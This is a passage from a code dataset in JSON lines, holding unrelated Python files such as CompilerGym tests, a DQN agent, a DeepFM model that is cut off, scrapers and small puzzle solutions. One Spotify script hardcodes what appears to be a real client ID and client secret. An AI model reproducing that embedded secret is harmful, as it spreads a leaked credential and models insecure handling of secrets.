dict, body: bytes) -> str:\r\n return await cls._rpc(\"projz_generate_request_signature\", path, headers, body)\r\n\r\n @classmethod\r\n async def generate_device_id(cls, installation_id: str) -> str:\r\n return await cls._rpc(\"projz_generate_device_id\", installation_id)\r\n\r\n @classmethod\r\n async def generate_smid(cls, organization: str, platform: str, version: str, model: str, app_id: str):\r\n return await cls._rpc(\"projz_generate_smid\", organization, platform, version, model, app_id)\r\n\r\n @classmethod\r\n async def generate_wallet_recovery_data(cls, strength: int, language: str) -> tuple[str, str]:\r\n return await cls._rpc(\"projz_generate_wallet_recovery_data\", strength, language)\r\n","repo_name":"Sparta403/ProjectZd","sub_path":"ProjectZPlus/api/control/rpc.py","file_name":"rpc.py","file_ext":"py","file_size_in_byte":1894,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"16033356995","text":"#!/usr/bin/python3\n\nimport requests\nimport argparse\nfrom random import randint\n\n\nparser = argparse.ArgumentParser(description=\"Show, random or specific, indiehacker's quotes\")\nparser.add_argument('-m', '--max_random', metavar='N', type=int,\n help='max value of random range', default=1500)\nparser.add_argument('-n', '--number_of_quotes', metavar='N', type=int,\n help='number of quotes to show', default=1)\n\nparser.add_argument('-q', '--quote', metavar='QUOTE_INDEX', type=int,\n help='get quote identified by index QUOTE', default=None)\n\n\n\nBASE_URL = 'https://indie-hackers.firebaseio.com/loadingQuotes/{}.json'\n\n\n\ndef render_quote(quote):\n\n if quote is None:\n print(\"Quote not found. Probably this one does not exists.\")\n return\n\n header_str = 'Quote: #%s' % quote['quote_index']\n print(\"\\n%s\\n%s\" % (header_str, '='*len(header_str)))\n print(\"\\\"%s\\\"\" % quote['quote'])\n print(\"\\n%s, %s - %s\" %(quote['author'], quote['company'], quote['mrr']))\n print(\"%s\\n\" %(quote['url']))\n\n\ndef get_quote(quote_index):\n\n url_req = BASE_URL.format( quote_index )\n res = None\n\n # send request\n r = requests.get(url = url_req)\n data = r.json()\n\n if data is not None:\n\n quote = data['quote']\n quote_url = data.get('url', '----')\n\n byline = data['byline']\n components = byline.split('of')\n author = components[0].rstrip()\n round_bracket_index = components[1].find('(')\n company = components[1][0: round_bracket_index - 1]\n mrr = components[1][round_bracket_index +1 : -1]\n\n res = dict()\n\n res['quote'] = quote\n res['author'] = author\n res['company'] = company\n res['mrr'] = mrr\n res['quote_index'] = quote_index\n res['url'] = quote_url\n\n return res\n\n\ndef get_random_quote(max_quote):\n\n data = None\n random_quote_index = None\n res = dict()\n\n max_range = max_quote\n\n # while you can't find a valid quote search randomly\n while True :\n # the max value should get from somewhere\n random_quote_index = randint(0, max_range)\n\n data = get_quote(random_quote_index)\n if data is not None:\n break\n # the range is too big so adjust max value\n # with the current random value\n max_range = random_quote_index\n\n return data\n\n\n\nif __name__ == \"__main__\":\n\n args = parser.parse_args()\n\n if args.quote is not None:\n quote = get_quote(args.quote)\n render_quote(quote)\n else:\n\n for i in range(0, args.number_of_quotes):\n quote = get_random_quote(args.max_random)\n render_quote(quote)\n\n","repo_name":"Cereal84/indie-hackers-quotes","sub_path":"indiequotes.py","file_name":"indiequotes.py","file_ext":"py","file_size_in_byte":2696,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"1058231911","text":"from numbers import Real\n\nimport gym\nimport numpy as np\nimport pytest\n\nimport compiler_gym\nfrom compiler_gym.envs import CompilerEnv, mlir\nfrom compiler_gym.envs.mlir import MlirEnv\nfrom compiler_gym.service.connection import CompilerGymServiceConnection\nfrom compiler_gym.spaces import (\n ActionSpace,\n Box,\n Dict,\n Discrete,\n NamedDiscrete,\n Permutation,\n Scalar,\n SpaceSequence,\n)\nfrom compiler_gym.spaces import Tuple as TupleSpace\nfrom compiler_gym.wrappers.mlir import convert_action, make_mlir_rl_wrapper_env\nfrom tests.test_main import main\n\npytest_plugins = [\"tests.pytest_plugins.common\", \"tests.pytest_plugins.mlir\"]\n\n\n@pytest.fixture(scope=\"function\", params=[\"local\", \"service\"])\ndef env(request) -> CompilerEnv:\n \"\"\"Create an MLIR environment.\"\"\"\n if request.param == \"local\":\n with gym.make(\"mlir-v0\") as env:\n yield env\n else:\n service = CompilerGymServiceConnection(mlir.MLIR_SERVICE_BINARY)\n try:\n with MlirEnv(service=service.connection.url) as env:\n yield env\n finally:\n service.close()\n\n\ndef test_service_version(env: MlirEnv):\n assert env.version == compiler_gym.__version__\n\n\ndef test_compiler_version(env: MlirEnv):\n assert env.compiler_version.startswith(\"LLVM 14.\")\n\n\ndef test_action_spaces_names(env: MlirEnv):\n assert {a.name for a in env.action_spaces} == {\"MatrixMultiplication\"}\n\n\ndef test_action_space(env: MlirEnv):\n expected_action_space = ActionSpace(\n SpaceSequence(\n name=\"MatrixMultiplication\",\n size_range=[1, 4],\n space=Dict(\n name=None,\n spaces={\n \"tile_options\": Dict(\n name=None,\n spaces={\n \"interchange_vector\": Permutation(\n name=None,\n scalar_range=Scalar(name=None, min=0, max=2, dtype=int),\n ),\n \"tile_sizes\": Box(\n name=None,\n low=np.array([1] * 3, dtype=int),\n high=np.array([2**32] * 3, dtype=int),\n dtype=np.int64,\n ),\n \"promote\": Scalar(\n name=None, min=False, max=True, dtype=bool\n ),\n \"promote_full_tile\": Scalar(\n name=None, min=False, max=True, dtype=bool\n ),\n \"loop_type\": NamedDiscrete(\n name=None,\n items=[\"loops\", \"affine_loops\"],\n ),\n },\n ),\n \"vectorize_options\": Dict(\n name=None,\n spaces={\n \"vectorize_to\": NamedDiscrete(\n name=None,\n items=[\"dot\", \"matmul\", \"outer_product\"],\n ),\n \"vector_transfer_split\": NamedDiscrete(\n name=None,\n items=[\"none\", \"linalg_copy\", \"vector_transfer\"],\n ),\n \"unroll_vector_transfers\": Scalar(\n name=None,\n min=False,\n max=True,\n dtype=bool,\n ),\n },\n ),\n },\n ),\n )\n )\n assert expected_action_space == env.action_space\n\n\ndef test_set_observation_space_from_spec(env: MlirEnv):\n env.observation_space = env.observation.spaces[\"Runtime\"]\n obs = env.observation_space\n\n env.observation_space = \"Runtime\"\n assert env.observation_space == obs\n\n\ndef test_set_reward_space_from_spec(env: MlirEnv):\n env.reward_space = env.reward.spaces[\"runtime\"]\n reward = env.reward_space\n\n env.reward_space = \"runtime\"\n assert env.reward_space == reward\n\n\ndef test_mlir_rl_wrapper_env_action_space(env: MlirEnv):\n wrapper_env = make_mlir_rl_wrapper_env(env)\n action_space = wrapper_env.action_space\n tile_size = NamedDiscrete(\n name=None,\n items=[\"1\", \"2\", \"4\", \"8\", \"16\", \"32\", \"64\", \"128\", \"256\", \"512\", \"1024\"],\n )\n expected_subspace = Dict(\n name=None,\n spaces={\n \"tile_options\": Dict(\n name=None,\n spaces={\n \"interchange_vector\": Discrete(name=None, n=6),\n \"tile_sizes\": TupleSpace(\n name=None, spaces=[tile_size, tile_size, tile_size]\n ),\n \"promote\": NamedDiscrete(name=None, items=[\"False\", \"True\"]),\n \"promote_full_tile\": NamedDiscrete(\n name=None, items=[\"False\", \"True\"]\n ),\n \"loop_type\": NamedDiscrete(\n name=None,\n items=[\"loops\", \"affine_loops\"],\n ),\n },\n ),\n \"vectorize_options\": Dict(\n name=None,\n spaces={\n \"vectorize_to\": NamedDiscrete(\n name=None, items=[\"dot\", \"matmul\", \"outer_product\"]\n ),\n \"vector_transfer_split\": NamedDiscrete(\n name=None,\n items=[\"none\", \"linalg_copy\", \"vector_transfer\"],\n ),\n \"unroll_vector_transfers\": NamedDiscrete(\n name=None, items=[\"False\", \"True\"]\n ),\n },\n ),\n },\n )\n assert action_space[0] == expected_subspace\n for i in range(1, 4):\n assert action_space[i][\"is_present\"] == NamedDiscrete(\n name=None, items=[\"False\", \"True\"]\n )\n assert action_space[i][\"space\"] == expected_subspace\n\n\ndef test_convert_action():\n action = [\n {\n \"tile_options\": {\n \"interchange_vector\": 5,\n \"tile_sizes\": [1, 3, 9],\n \"promote\": 1,\n \"promote_full_tile\": 0,\n \"loop_type\": 1,\n },\n \"vectorize_options\": {\n \"vectorize_to\": 2,\n \"vector_transfer_split\": 1,\n \"unroll_vector_transfers\": 1,\n },\n },\n {\"is_present\": 0},\n ]\n converted_action = convert_action(action)\n\n expected_action = [\n {\n \"tile_options\": {\n \"interchange_vector\": np.array([2, 1, 0], dtype=int),\n \"tile_sizes\": [2, 8, 512],\n \"promote\": True,\n \"promote_full_tile\": False,\n \"loop_type\": 1,\n },\n \"vectorize_options\": {\n \"vectorize_to\": 2,\n \"vector_transfer_split\": 1,\n \"unroll_vector_transfers\": True,\n },\n }\n ]\n\n assert len(converted_action) == len(expected_action)\n assert len(converted_action[0]) == len(expected_action[0])\n assert len(converted_action[0][\"tile_options\"]) == len(\n expected_action[0][\"tile_options\"]\n )\n assert len(converted_action[0][\"vectorize_options\"]) == len(\n expected_action[0][\"vectorize_options\"]\n )\n\n\ndef test_mlir_rl_wrapper_env_observation_space(env: MlirEnv):\n wrapper_env = make_mlir_rl_wrapper_env(env)\n observation_space = wrapper_env.observation_space\n assert observation_space == Box(\n name=\"Runtime\", shape=[1], low=0, high=np.inf, dtype=float\n )\n\n\ndef test_mlir_rl_wrapper_env_step(env: MlirEnv):\n wrapper_env = make_mlir_rl_wrapper_env(env)\n action_space = wrapper_env.action_space\n action_space.seed(123)\n action = action_space.sample()\n print(action)\n observation, reward, done, _ = wrapper_env.step(action)\n assert isinstance(observation, np.ndarray)\n assert np.array_equal(observation.shape, [1])\n assert observation[0] > 0\n assert isinstance(reward, Real)\n assert observation[0] == -reward\n assert isinstance(done, bool)\n assert done\n\n\ndef test_mlir_rl_wrapper_env_reset(env: MlirEnv):\n wrapper_env = make_mlir_rl_wrapper_env(env)\n action_space = wrapper_env.action_space\n action_space.seed(123)\n observation = wrapper_env.reset()\n assert isinstance(observation, np.ndarray)\n assert np.array_equal(observation.shape, [1])\n assert observation[0] == 0\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"facebookresearch/CompilerGym","sub_path":"tests/mlir/mlir_env_test.py","file_name":"mlir_env_test.py","file_ext":"py","file_size_in_byte":8819,"program_lang":"python","lang":"en","doc_type":"code","stars":821,"dataset":"github-code","pt":"78"} +{"seq_id":"32324295588","text":"import spotipy\nfrom spotipy.oauth2 import SpotifyClientCredentials\nimport unittest\nimport sqlite3\nimport json\nimport os\nimport matplotlib.pyplot as plt\nimport re\nimport requests\n\n# Create database and set up cursor and connection\ndef setUpDatabase(db_name):\n path = os.path.dirname(os.path.abspath(__file__))\n conn = sqlite3.connect(path+'/'+db_name)\n cur = conn.cursor()\n return cur, conn\n\n# Create Songs table to add to if it does not exist\ndef createTables(cur,conn):\n cur.execute(\"\"\"CREATE TABLE IF NOT EXISTS Songs\n (id INTEGER PRIMARY KEY UNIQUE, name TEXT, year INTEGER, duration INTEGER)\"\"\")\n\n conn.commit()\n\n# Go through 25 data items given a given index and year\ndef collectData(sp, year, index):\n end = index + 25\n results = sp.search(q=f'year:{year}',type='track', limit=50)\n data_l = []\n # print(results)\n for track in results['tracks']['items'][index:end]:\n # print(track)\n name = track[\"name\"].strip()\n duration = track[\"duration_ms\"]\n year = int(track['album'][\"release_date\"][:4].strip())\n data_l.append((name,year,duration))\n\n return data_l\n\n# update the Songs table with 25 pieces of collected data\ndef updateMainTable(cur,conn,data_l):\n for data in data_l:\n # print(formatted_data)\n\n cur.execute(\"\"\"INSERT OR IGNORE INTO Songs (name, year, duration) VALUES (?,?,?)\n \"\"\",(data))\n\n conn.commit()\n\n\n\ndef main():\n # Create connection to spotify API with spotipy\n sp = spotipy.Spotify(auth_manager=SpotifyClientCredentials(client_id=\"9e43dbbe8a254c218b7cc2aec2dc1d2b\",\n client_secret=\"2567b0ec45c14442a2bfc6ea3446b5e3\"))\n cur, conn = setUpDatabase(\"final.db\")\n createTables(cur, conn)\n \n # Prompt user for input until a valid one is entered or -1 is entered to stop program without adding\n # Also keeps track of index to use and year to search\n while True:\n try:\n user_year = int(input(\"\"\"Please input a year between 2001 and 2022 to add 25 songs from (type \"-1\" to end code). \"\"\"))\n if user_year == -1:\n (\"Ending Program\")\n return None\n if user_year > 2000 and user_year < 2023:\n amount_from_year = cur.execute(\"\"\"SELECT year FROM Songs WHERE\n year = (?)\"\"\",(user_year,)).fetchall()\n # print(amount_from_year)\n index = len(amount_from_year)\n if index > 25:\n print(\"You have the maximum data for this year, choose another please\")\n else:\n year = user_year\n break\n else:\n print(\"Invalid Year, please try again\")\n except:\n print(1)\n print(\"Invalid Year, please try again\")\n\n data_l = collectData(sp, year, index)\n # data_l = collectData(api_key, 2018, 0)\n # print(data_l)\n\n updateMainTable(cur,conn,data_l)\n\n\n\n pass\n\n\n\nmain()","repo_name":"viraux/206-Final","sub_path":"music_data.py","file_name":"music_data.py","file_ext":"py","file_size_in_byte":3012,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"37498136746","text":"#PE116\r\n\"\"\"\r\nVoir description PE114\r\n\"\"\"\r\n\r\ndef fact(n):\r\n p = 1\r\n for i in range(2, n+1):\r\n p *= i\r\n return p\r\n\r\ndef C_n_k(n, k):\r\n return fact(n)//(fact(k)*fact(n-k))\r\n\r\n\r\ndef F(m, Ltot):\r\n arr = 0 #1\r\n # Boucle sur le nombre de segments rouges\r\n for k in range(1, (Ltot)//(m)+1):\r\n lr = m * k\r\n #Arr = arrangements du noir\r\n # nombre de positions de cases parmi les cases restantes + cases rouges\r\n arr += C_n_k(Ltot - lr + k, k)\r\n return arr\r\n\r\nLtot = 50\r\na = F(2,Ltot)\r\nb = F(3,Ltot)\r\nc = F(4,Ltot)\r\n\r\nprint(a, b, c)\r\nprint(\"TOTAL = \", a+b+c)\r\n","repo_name":"lenaindelaforetmagique/ProjectEuler","sub_path":"Python/PE116.py","file_name":"PE116.py","file_ext":"py","file_size_in_byte":608,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"15881850880","text":"from rest_framework import serializers\n\nfrom extras.models import IXAPI, JobResult, Webhook\nfrom peering_manager.api import BaseModelSerializer, ContentTypeField\nfrom users.api.nested_serializers import NestedUserSerializer\n\nfrom .nested_serializers import *\n\n__all__ = (\n \"JobResultSerializer\",\n \"WebhookSerializer\",\n \"NestedJobResultSerializer\",\n \"NestedWebhookSerializer\",\n)\n\n\nclass IXAPISerializer(BaseModelSerializer):\n class Meta:\n model = IXAPI\n fields = [\"id\", \"display\", \"name\", \"url\", \"api_key\", \"api_secret\", \"identity\"]\n\n\nclass IXAPICustomerSerializer(serializers.Serializer):\n url = serializers.CharField()\n api_key = serializers.CharField()\n api_secret = serializers.CharField()\n\n\nclass JobResultSerializer(serializers.ModelSerializer):\n url = serializers.HyperlinkedIdentityField(view_name=\"extras-api:jobresult-detail\")\n user = NestedUserSerializer(read_only=True)\n obj_type = ContentTypeField(read_only=True)\n output = serializers.CharField(read_only=True)\n\n class Meta:\n model = JobResult\n fields = [\n \"id\",\n \"url\",\n \"created\",\n \"completed\",\n \"name\",\n \"obj_type\",\n \"status\",\n \"user\",\n \"data\",\n \"job_id\",\n \"output\",\n ]\n\n\nclass WebhookSerializer(serializers.ModelSerializer):\n class Meta:\n model = Webhook\n fields = [\n \"id\",\n \"name\",\n \"type_create\",\n \"type_update\",\n \"type_delete\",\n \"url\",\n \"enabled\",\n \"http_method\",\n \"http_content_type\",\n \"secret\",\n \"ssl_verification\",\n \"ca_file_path\",\n ]\n","repo_name":"maznu/peering-manager","sub_path":"extras/api/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":1759,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"78"} +{"seq_id":"35244912041","text":"import sys\nfrom collections import deque\nsys.setrecursionlimit(10**6)\ninput = sys.stdin.readline\n\n\ndef dfs(i):\n visited[i] = 1\n for j in g[i]:\n if not visited[j]:\n dfs(j)\n stack.append(i)\n\n\ndef dfs_rev(i):\n global cnt\n ans = cash[i]\n visited[i] = cnt\n for j in gr[i]:\n if not visited[j]:\n ans += dfs_rev(j)\n return ans\n\n\ndef dfs_cash(i):\n global dp\n if dp[i] == -1:\n temp = 0\n for j in g_scc[i]:\n temp = max(temp, dfs_cash(j))\n if temp == 0 and not r_scc[i]:\n dp[i] = 0\n else:\n dp[i] = sums[i] + temp\n return dp[i]\n\n\n# input\nn, m = map(int, input().split())\n\ng = [[] for _ in range(n + 1)]\ngr = [[] for _ in range(n + 1)]\nfor _ in range(m):\n a, b = map(int, input().split())\n g[a].append(b)\n gr[b].append(a)\n\ncash = [0] + [int(input()) for _ in range(n)]\ns, p = map(int, input().split())\nrestaurant = list(map(int, input().split()))\n\n# Kosaraju's algorithm\ncnt = 0\nstack = []\nvisited = [0] * (n + 1)\nfor i in range(1, n + 1):\n if not visited[i]:\n cnt += 1\n dfs(i)\n\ncnt = 0\nvisited = [0] * (n + 1)\nsums = []\nfor i in reversed(stack):\n if not visited[i]:\n cnt += 1\n sums.append(dfs_rev(i))\n\n# graph between sccs\ng_scc = [set() for _ in range(cnt)]\nr_scc = [0] * cnt\nfor i in range(1, n + 1):\n for j in g[i]:\n if visited[i] != visited[j]:\n g_scc[visited[i] - 1].add(visited[j] - 1)\n if i in restaurant:\n r_scc[visited[i] - 1] = 1\n\n# search\ndp = [-1] * cnt\nprint(dfs_cash(visited[s] - 1))\n","repo_name":"lapis42/boj","sub_path":"boj4013_atm_scc.py","file_name":"boj4013_atm_scc.py","file_ext":"py","file_size_in_byte":1589,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"2321644206","text":"from app import app\nimport concurrent.futures\nimport datetime\nimport itertools\nimport lxml\nimport lxml.html\nimport requests\nfrom urlparse import urljoin\n\n\ndef fix_url(url):\n \"\"\"Fixes anomalous URL paths\n :param url: the url to fix\n \"\"\"\n return \"http://\" + url if \"://\" not in url else url\n\n\ndef scrape(page, rows_xpath, mapping, next_xpath=None, stop_condition=None):\n \"\"\"Function to scrape data from web pages\n :param page: the page to scrape\n :param rows_xpath: the xpath to the target data that needs scraping\n :param mapping: parameter to supply a dictionary containing the mapping of\n scraped data to keywords\n :param next_xpath: the xpath to the target page's \"next page\" button\n :param stop_condition: parameter to supply a boolean stop condition\n \"\"\"\n try:\n while page:\n document = lxml.html.fromstring(requests.get(page).text)\n\n for row in document.xpath(rows_xpath):\n item = {key: value(row) for key, value in mapping.items()}\n\n yield item\n\n if stop_condition and stop_condition(row, item):\n return\n\n if next_xpath:\n next_links = document.xpath(next_xpath)\n page = urljoin(page, next_links[\n 0]) if next_links else None\n\n else:\n page = None\n\n except requests.ConnectionError:\n # catch connection errors\n app.logger.warning('connection error: scraping [{}]'.format(str(page)))\n\n except requests.HTTPError:\n # catch htp errors\n app.logger.warning('http error: scraping [{}]'.format(str(page)))\n\n except Exception:\n # catch any other exception for debugging purposes\n app.logger.critical(\"error: scraping [{}]\".format(str(page)))\n\ndef scrape_source(config):\n \"\"\"Function to scrape data from malware sources\"\"\"\n return list(itertools.chain(*concurrent.futures.ThreadPoolExecutor(5).map(\n lambda args: scrape(*args), config)))\n\n\nif __name__ == '__main__':\n ''''''\n","repo_name":"team-miv/miv-tracker","sub_path":"feeder/scrape.py","file_name":"scrape.py","file_ext":"py","file_size_in_byte":2070,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"78"} +{"seq_id":"44922544813","text":"import numpy as np\nimport tensorflow as tf\n\n\nclass DQN(object):\n def __init__(self, env, args):\n self.env = env\n self.args = args\n\n self.hidden_size = self.args.get('hidden_size', 32)\n self.num_actions = self.env.action_space.n\n self.num_states = self.env.observation_space.shape[0]\n\n self._add_ops()\n self.policy()\n self.build_train()\n self.update_target()\n self.build_train_op()\n\n def _add_ops(self):\n self.state = tf.placeholder(tf.float32, shape=(None, self.num_states), name='state')\n self.action = tf.placeholder(tf.int32, [None], name='action')\n self.reward = tf.placeholder(tf.float32, [None], name='reward')\n self.next_state = tf.placeholder(tf.float32, shape=(None, self.num_states), name='next_state')\n self.done_mask = tf.placeholder(tf.float32, [None], name='done')\n\n self.stochastic = tf.placeholder(tf.bool, (), name='stochastic')\n self.update_epsion = tf.placeholder(tf.float32, (), name='update_epsion')\n\n def _get_qa_value(self, inputs, num_actions, scope='qa_value', reuse=False):\n with tf.variable_scope(scope, reuse=reuse):\n latent = tf.layers.dense(inputs, units=64, activation=tf.tanh, name='fc1')\n # latent = tf.layers.dense(latent, units=64, activation=tf.tanh, name='fc2')\n action_scores = tf.layers.dense(latent, units=num_actions, activation=None)\n \n return action_scores\n\n def policy(self, scope='deepq', reuse=None):\n with tf.variable_scope(scope, reuse=reuse):\n eps = tf.get_variable('eps', (), initializer=tf.constant_initializer())\n\n q_values = self._get_qa_value(self.state, self.num_actions, scope=\"q_func\")\n deterministic_actions = tf.argmax(q_values, axis=1)\n\n batch_size = tf.shape(self.state)[0]\n random_actions = tf.random_uniform(tf.stack([batch_size]), minval=0, maxval=self.num_actions, dtype=tf.int64)\n chose_random = tf.random_uniform(tf.stack([batch_size]), minval=0, maxval=1, dtype=tf.float32) < eps\n stochastic_actions = tf.where(chose_random, random_actions, deterministic_actions)\n\n self.output_actions = tf.cond(self.stochastic, lambda: stochastic_actions, lambda: deterministic_actions)\n self.update_eps_expr = eps.assign(tf.cond(self.update_epsion >= 0, lambda: self.update_epsion, lambda: eps))\n\n def build_train(self, gamma=1.0, reuse=None):\n with tf.variable_scope('deepq', reuse=reuse):\n # q network evaluation\n q_t = self._get_qa_value(self.state, self.num_actions, scope=\"q_func\", reuse=True)\n self.q_func_vars = tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES,\n scope=tf.get_variable_scope().name + \"/q_func\")\n\n # target q network evalution\n q_t1 = self._get_qa_value(self.next_state, self.num_actions, scope=\"target_q_func\")\n self.target_q_func_vars = tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES,\n scope=tf.get_variable_scope().name + \"/target_q_func\")\n\n q_t_selected = tf.reduce_sum(q_t * tf.one_hot(self.action, self.num_actions), 1)\n q_t1_best = tf.reduce_max(q_t1, 1)\n q_t1_best_masked = (1.0 - self.done_mask) * q_t1_best\n q_t_selected_target = self.reward + gamma * q_t1_best_masked\n \n td_error = q_t_selected - tf.stop_gradient(q_t_selected_target)\n\n def huber_loss(x, delta=1.0):\n \"\"\"Reference: https://en.wikipedia.org/wiki/Huber_loss\"\"\"\n return tf.where(\n tf.abs(x) < delta,\n tf.square(x) * 0.5,\n delta * (tf.abs(x) - 0.5 * delta)\n )\n errors = huber_loss(td_error)\n self.loss = tf.reduce_mean(errors)\n\n def update_target(self):\n update_target_expr = []\n for var, var_target in zip(sorted(self.q_func_vars, key=lambda v: v.name), \n sorted(self.target_q_func_vars, key=lambda v: v.name)):\n update_target_expr.append(var_target.assign(var))\n self.update_target_params = tf.group(*update_target_expr)\n\n def build_train_op(self):\n optimizer = tf.train.AdamOptimizer(1e-3)\n grads_and_vars = optimizer.compute_gradients(self.loss, var_list=self.q_func_vars)\n self.train_op = optimizer.apply_gradients(grads_and_vars)\n\n def train_step(self, sess, batch):\n feed_dict = {\n self.state: batch[0],\n self.action: batch[1],\n self.reward: batch[2],\n self.next_state: batch[3],\n self.done_mask: batch[4]\n }\n _, loss = sess.run([self.train_op, self.loss], feed_dict)\n \n return loss\n\n def get_action(self, sess, state, rand=True, eps=-1):\n feed_dict = {\n self.state: np.reshape(state, (-1, self.num_states)),\n self.stochastic: rand,\n self.update_epsion: eps\n }\n action, _ = sess.run([self.output_actions, self.update_eps_expr], feed_dict)\n # action = sess.run(self.output_actions, feed_dict)\n\n return action[0]\n\n","repo_name":"kpsc/deep-reinforcement-learning","sub_path":"dqn/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":5287,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"30029768563","text":"import timeit\n\nruns = 1000000\ntotal_time = 0\nfor _ in range(runs):\n start = timeit.default_timer() # these are laptop dependent, i.e. better computers will do better than my laptop\n n = 0\n for i in range(10):\n n += i\n end = timeit.default_timer()\n total_time += end - start\n\nprint(total_time/runs)\n\n# in general the more tests you do, the more precise answer you are going to get","repo_name":"HilaryHe1012/LecInfo","sub_path":"Timeit.py","file_name":"Timeit.py","file_ext":"py","file_size_in_byte":401,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"37587159534","text":"import numpy as np\nimport tensorflow as tf\n\nimport keras\nimport pandas as pd\nfrom keras.utils import plot_model\nfrom sklearn.preprocessing import OneHotEncoder, LabelEncoder\nfrom keras import backend as K\nimport gc\nfrom keras.layers import Input, Embedding, Dense,Flatten, Concatenate, Activation, Reshape, BatchNormalization, \\\n Dropout, Add, RepeatVector, Multiply, Lambda, Subtract\nfrom keras.models import Model\nfrom keras.optimizers import Adam\nimport time\n\n# 对离散型变量进行编码 (LabelEncoder:[1,2,6] -> [0,1,2], OneHotEncode:[1] -> [0,1,0])\ndef category_encode(train_np, test_np=None, one_hot=True):\n lb_enc = LabelEncoder()\n train_all = np.vstack((train_np, test_np))\n train_all = np.unique(train_all)\n lb_enc.fit(train_all.reshape(-1, 1))\n train_np = lb_enc.transform(train_np.reshape(-1, 1))\n test_np = lb_enc.transform(test_np.reshape(-1, 1))\n if one_hot:\n oh_enc = OneHotEncoder()\n train_all = np.vstack((train_np.reshape(-1, 1), test_np.reshape(-1, 1)))\n train_all = np.unique(train_all)\n oh_enc.fit(train_all.reshape(-1, 1))\n sparse_train_np = oh_enc.transform(train_np.reshape(-1, 1))\n sparse_test_np = oh_enc.transform(test_np.reshape(-1, 1))\n return sparse_train_np, sparse_test_np\n return train_np, test_np\n\ndef log_loss(y_true, y_pred):\n log_loss = K.sum(K.binary_crossentropy(y_true, y_pred), axis=-1)\n return log_loss\n\n\nclass DeepFM():\n def __init__(self, params):\n self.dnn_layers = params.get(\"dnn_layers\", 4)\n self.emb_dims = params.get(\"emb_dims\", 4)\n self.dnn_dims = params.get(\"dnn_dims\", 8)\n self.label_col = params.get(\"label_col\", \"label\")\n self.category_col = params.get(\"category_col\", []) # possible values of each feature\n self.continue_col = params.get(\"continue_col\", [])\n self.learning_rate = params.get(\"learning_rate\", 0.01)\n self.batch_size = params.get(\"batch_size\", 64)\n self.epochs = params.get(\"epochs\", 10)\n self.seed = params.get(\"random_seed\", 2021)\n self.regularize = params.get(\"regularize\", keras.regularizers.l2)\n self.opt_reg_param = params.get(\"opt_rag_param\", 0.15)\n self.layer_reg_param = params.get(\"layer_reg_param\", 0.2)\n self.dropout = params.get(\"dropout\", 0.9)\n self.continue_use_emb = params.get(\"continue_use_emb\", True)\n self.model_name = params.get(\"model_name\", \"deepFM\")\n self.model = None\n\n def build_model(self):\n dnn_layers = self.dnn_layers\n emb_dim = self.emb_dims\n dnn_dim = self.dnn_dims\n category_col = self.category_col\n continue_col = self.continue_col\n lr = self.learning_rate\n seed = self.seed\n reg = self.regularize\n layer_reg_param = self.layer_reg_param\n dropout = self.dropout\n continue_use_emb = self.continue_use_emb\n\n np.random.seed(seed)\n inputs = []\n flatten_layers = []\n\n # ------second order term------- 离散型和连续型变量统一编码为隐向量,维度一致\n for category_index, num in enumerate(category_col):\n inputs_c = Input(shape=(1,), dtype='int32', name='input_%d' % category_index)\n inputs.append(inputs_c)\n embed_c = Embedding(\n num,\n emb_dim,\n input_length=1,\n name='embed_%d' % category_index,\n embeddings_regularizer=reg(layer_reg_param)\n )(inputs_c)\n\n flatten_c = Reshape((emb_dim,))(embed_c)\n flatten_layers.append(flatten_c)\n inputs_dict = []\n\n for continue_feature in continue_col:\n inputs_c = Input(shape=(1,), dtype='float', name='input_sec_%s' % continue_feature)\n inputs.append(inputs_c)\n inputs_c = BatchNormalization(name='BN_%s' % continue_feature)(inputs_c)\n inputs_dict.append(inputs_c)\n if continue_use_emb:\n inputs_c = Dense(emb_dim)(inputs_c)\n else:\n inputs_c = RepeatVector(emb_dim)(inputs_c)\n inputs_c = Flatten()(inputs_c)\n flatten_layers.append(inputs_c)\n\n sum_features_emb = Add()(flatten_layers)\n sum_square_features_emb = Multiply()([sum_features_emb, sum_features_emb]) # 和的平方\n square_list = []\n for layer in flatten_layers:\n square_feature_emb = Lambda(lambda x: x**2)(layer)\n square_list.append(square_feature_emb)\n square_sum_features_emb = Add()(square_list) # 平方的和\n y_second_order = Subtract()([sum_square_features_emb, square_sum_features_emb])\n y_second_order = Lambda(lambda x: x * 0.5)(y_second_order)\n y_second_order = Dropout(dropout, seed=seed)(y_second_order)\n\n # ----first order------\n fm_layers = []\n for category_index, num in enumerate(category_col):\n embed_c = Embedding(\n num,\n 1,\n input_length=1,\n name='linear_%s' % category_index,\n embeddings_regularizer=reg(layer_reg_param)\n )(inputs[category_index])\n flatten_c = Flatten()(embed_c)\n fm_layers.append(flatten_c)\n\n for index, _ in enumerate(continue_col):\n inputs_c = Dense(1)(inputs[len(category_col)+index])\n fm_layers.append(inputs_c)\n y_first_order = Add()(fm_layers)\n y_first_order = BatchNormalization()(y_first_order)\n y_first_order = Dropout(dropout, seed=seed)(y_first_order)\n\n # deep\n y_deep = Concatenate()(flatten_layers) # None * (F*K)\n for index in range(dnn_layers):\n y_deep = Dense(dnn_dim)(y_deep)\n y_deep = Activation('relu', name='deep_%d' % index)(y_deep)\n y_deep = Dropout(rate=dropout, seed=seed)(y_deep)\n\n concat_input = Concatenate(axis=1)([y_first_order, y_second_order, y_deep])\n\n outputs = Dense(1, activation='sigmoid', name='output')(concat_input)\n self.model = Model(inputs=inputs, outputs=outputs, name='model')\n solver = Adam(lr=lr, 